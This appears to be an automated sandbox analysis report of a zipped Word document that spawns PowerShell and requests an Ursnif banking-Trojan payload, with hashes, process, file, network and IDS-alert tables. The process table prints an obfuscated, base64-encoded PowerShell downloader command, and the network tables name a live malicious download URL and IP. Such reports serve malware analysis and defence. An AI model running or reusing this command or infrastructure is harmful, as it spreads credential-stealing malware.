File name: | 1050392589d4bc90c2b5b909377e3deb99b3e230 |
Full analysis: | https://app.any.run/tasks/b206bf1c-80d1-4fa7-b232-7bb6dd65d64f |
Verdict: | Malicious activity |
Threats: | Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. |
Analysis date: | June 12, 2019, 11:20:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 47C94C104859324F6C35D5C63E1EA4B2 |
SHA1: | 1050392589D4BC90C2B5B909377E3DEB99B3E230 |
SHA256: | 1852E6587E13F38AF3645B50416A8CD54DA73B7BF787D9F755DFB811CFA1CCE6 |
SSDEEP: | 1536:Q8EAdqSwvN/7sIx26b3uyiE8EjP34MHM4QYjddJuoXm:Q81dqSAzsl6DuyiE8Ej7QYZdJC |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | info_12.06.doc |
---|---|
ZipUncompressedSize: | 83285 |
ZipCompressedSize: | 80113 |
ZipCRC: | 0x603ece45 |
ZipModifyDate: | 2019:06:12 02:04:21 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0009 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
456 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\1050392589d4bc90c2b5b909377e3deb99b3e230.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
3880 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\info_12.06.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3000 | powershell -Encod IAAoACAALgAoACcATgBFAHcALQBvACcAKwAnAEIAagBFACcAKwAnAEMAVAAnACkAIAAgAFMAYAB5AHMAVABlAE0AYAAuAGAASQBvAC4AUwBgAFQAUgBFAGAAQQBNAHIARQBhAGQAYABFAHIAKAAoACAALgAoACcATgBFAHcALQBvAEIAagBFACcAKwAnAEMAJwArACcAVAAnACkAIABzAHkAUwBgAFQAZQBgAG0ALgBgAEkAbwBgAC4AYABjAE8ATQBwAGAAUgBlAFMAcwBgAGkAYABPAE4ALgBkAGUARgBsAEEAYABUAGUAcwBgAFQAcgBFAGEATQAoAFsAcwB5AFMAdABlAE0ALgBJAE8ALgBtAGUATQBPAHIAeQBzAHQAUgBFAGEAbQBdAFsAUwBZAFMAVABFAG0ALgBjAE8ATgB2AEUAUgB0AF0AOgA6AGYAcgBPAG0AQgBBAHMARQA2ADQAcwB0AFIAaQBOAEcAKAAgACcAVABaAEYAZABiADkAbwB3AEYASQBiAC8AaQBpADgAaQBuAFMAQwBHAFcAUgBDAGwAbABNAGoAYQB1AHEAUQBkADYAYgBvAEcAUQBhAEcASQBiAFUASgBPAGMASQBqAHoAWQBYAHUASgBHADYAOQBCAC8AUABmAGwAWgBxAHkAMwByADkANQB6AG4AdgBQAG8AVwBOAHUAOAAzAFMAMwBEAHIAUwBGAEEAagBSAG0AMQBHADMAQwB0ADQASgBBAFkAMwA1AEUAWgBJAGcAagBHADAAMABtAFgAWgBIAHkAbgBFAGwASABkAEUAVgBnADcAbQBhADcAWABYAGYAUgA3ADYAVwBkADAAdQBrAHUASQB4AFUAUQB6AGUANgAxAFoAcABTAHEAWgA4AEkATAAxADQAUwBmADAATAB6AHYANgBnAE4AawBmADEAdgBYAFQAOABEAEUAWABOAHgANgBCAFgATwAzADEAQwA2ADIANgBxAEwAdwB6AFAASABWAEMAUQBRAFEAegBBAHgAbABsAEwATgBiAG8AaQBXAG4AOAB3AGkASwB2ADQARQB4AG8AMQA0AHAAZQBGAC8AbAA0ADAAaABCAEkAdABWAGEAegA0AFQAQwBhAGoARgB2AFQAYwBLAHkAbABHAGkAcgBuADQAOAAyAHcAYgBMAEIASwAxAGEAZQBDAEgASgBsAFUANQBSAFUAKwBVAEEAMQA0AHAAUQBxAHUAYgBmAGcATQBQAGQAZgB5AHIAcAAvAGIALwBJAEYAQQBFAE8ANQA5AFAAOAB2AEIAVABXAFQARgBhAEoAegBhADEAagB6AGYAcgBrAEwAKwB4AFUAZABjAG8ASAArAGcAMwBrAGwAWABiADYAZgBMAFoAZABpAFgAUgBoAFMAUwBIAHUANAA3AHMAZgA4AFQASAA5AEIARgB2AHkATwAwAHcAaAAvAEYANQBYAE4ASQA0AEoAQgA0ADEATABtAGwANABBAFkASgBzAHUAMgB2AFQAQQA4AEMAegBjAHAAMwBaAFYAdwB3AGMAZABRAHAARwBoAHcAWgBHAGwAMQBOAHAAdABNAGUATwB2ADMAdwBPAFQAMABLAFcAVwBzAGUAMQAzAGgAUgB5AFoAagBWADkAYQAvAFoAYgBLAFYAcABwAGUAMwAzAG4ARgBwADYANQByADcANwAwADAAbwBHAGQASgBTAEIARwAzAFUAZQB1AFcAdgB4AHEARgBqAGYAWgBnAFMAKwBlADMAUAB6AHoAUgBNAGgAbgBNADgAeAAxAFgARgA2AE8AcAArAHQAZABsAE0AcwBHADIAWABtAEIAQgBZAFAASwB0ADIAYgBEAGYAdwBGACcAIAApACAALAAgAFsAaQBvAC4AQwBvAE0AUABSAEUAUwBzAEkAbwBuAC4AYwBvAG0AUABSAEUAcwBzAEkATwBOAE0ATwBkAEUAXQA6ADoAZABFAGMATwBtAHAAcgBFAHMAUwAgACkAIAApACwAIABbAFMAeQBzAHQARQBtAC4AdABFAHgAdAAuAEUATgBjAG8AZABpAE4AZwBdADoAOgBhAHMAQwBJAGkAKQAgACkALgBSAGUAQQBkAHQAbwBFAG4AZAAoACkAfAAgAC4AKAAgACQAZQBuAFYAOgBDAG8ATQBTAHAAZQBjAFsANAAsADEANQAsADIANQBdAC0ASgBPAGkAbgAnACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
456 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb456.47178\info_12.06.doc | — | |
MD5:— | SHA256:— | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC79E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D573E2E0.wmf | — | |
MD5:— | SHA256:— | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5022ABEE.wmf | — | |
MD5:— | SHA256:— | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AD66E2C.wmf | — | |
MD5:— | SHA256:— | |||
3000 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8V2DVXZ8LSWEDLNCPQ0N.temp | — | |
MD5:— | SHA256:— | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D4F99A53.wmf | wmf | |
MD5:39F26699A838FAECCF4002BBE1A8D15D | SHA256:3DCD544173DAD4471A1B8C419DAE850DD7A2E02F0B8EFE2C3DBEC9AA3DF0CCA6 | |||
3880 | WINWORD.EXE | C:\Users\admin\Desktop\~$fo_12.06.doc | pgc | |
MD5:108F1B53B41FE962616E7D89F1AF4A4E | SHA256:C727FBC3F7FCABF6A5709F99C5DB4E88340113AD9AB01C9A3EAE741342451EF2 | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC818F17.dat | wmf | |
MD5:EE84E147491C4FED904732363F43099D | SHA256:B060D6D1E7C904843190EAFF2F0269974BBD457D197792915546668CEDECB4EC | |||
3880 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:86ABD0AAF2834FEC8233999AD967CC8C | SHA256:F7E06AE5C243CD92E89564585BED40ED5C31809B4B423DE51632D904528CC51F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3000 | powershell.exe | GET | 404 | 89.223.28.255:80 | http://b64zwvi.top/p109/mv.php?l=geopm5.dat | RU | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3000 | powershell.exe | 89.223.28.255:80 | b64zwvi.top | Trader soft LLC | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
b64zwvi.top |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
3000 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload |
3000 | powershell.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |